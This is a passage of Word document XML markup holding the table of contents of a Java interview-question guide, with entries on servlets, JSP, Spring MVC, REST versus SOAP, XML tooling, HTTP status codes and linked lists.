            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>512</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1106C84D" w14:textId="5674251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6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a dispatcher servlet?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307869 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>513</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4C3EE12D" w14:textId="24D7670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7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JSP?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307870 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>514</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="235165D3" w14:textId="44A6484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7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difference between servlet and JSP?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307871 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>515</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="04BC0767" w14:textId="5B0D152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7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JSP lifecycle?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307872 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>515</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C74B34A" w14:textId="6751FE4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7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Spring MVC? Explain architecture of spring MVC?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307873 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>516</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="640EF28D" w14:textId="76BA7BC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7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REST API?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307874 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>517</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C7BEECE" w14:textId="7A11B08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7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REST architecture?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307875 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>518</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="298517AC" w14:textId="4A348A7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7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does SOAP work?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307876 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>520</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="71E9FC38" w14:textId="21191CC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7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API and REST?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307877 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>521</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="387DEF46" w14:textId="2CC4948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7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SOAP and REST?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307878 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>522</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52511EE1" w14:textId="33880E8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7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ich among SOAP and REST is easy?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307879 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>523</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0D1A7E66" w14:textId="3CFFE77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8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do you know about DTD and XSD?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307880 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>523</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4C6FCEAB" w14:textId="4A99145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8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SOAP Web Service?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307881 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>525</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="78585820" w14:textId="2E3716A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8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Path in XML?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307882 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>526</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7039B3F1" w14:textId="5F8231A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8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rite a path for a given xml file?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307883 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>528</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="70B9092D" w14:textId="5C07F4B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8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use of XSLT?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307884 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>529</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="05A20175" w14:textId="7AFA8DA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8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are the action types of http?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307885 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>531</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="331E8D97" w14:textId="69E7D9A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8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how you will create a SOAP web service?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307886 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>532</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="362ABA84" w14:textId="3157F35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8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HTTP status code and explain all status codes?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307887 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>536</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20421992" w14:textId="5B21266F" w:rsidR="00012799" w:rsidRDefault="00012799">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307888" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Data Structure</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307888 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>538</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="22DBB1AF" w14:textId="361AB55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8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Find the middle element from the singly linked list without finding the length?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307889 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>538</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="613C5087" w14:textId="25C8AD6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9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Complexity to find length of singly linked list?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307890 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>538</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="61EA2F98" w14:textId="2E0ECCF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9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o you know how LinkedList works? Can you create a data structure for LinkedList?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307891 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>539</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7030D147" w14:textId="2C1D352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9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will you traverse LinkedList? Your List will contains multiple nodes so how will you traverse over it? Can you write a pseudo code? You have your head with you so how will you move to the next node? How will the current node be null?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307892 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>540</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1BD982B0" w14:textId="01BE965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9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Merge Sort?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307893 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>541</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
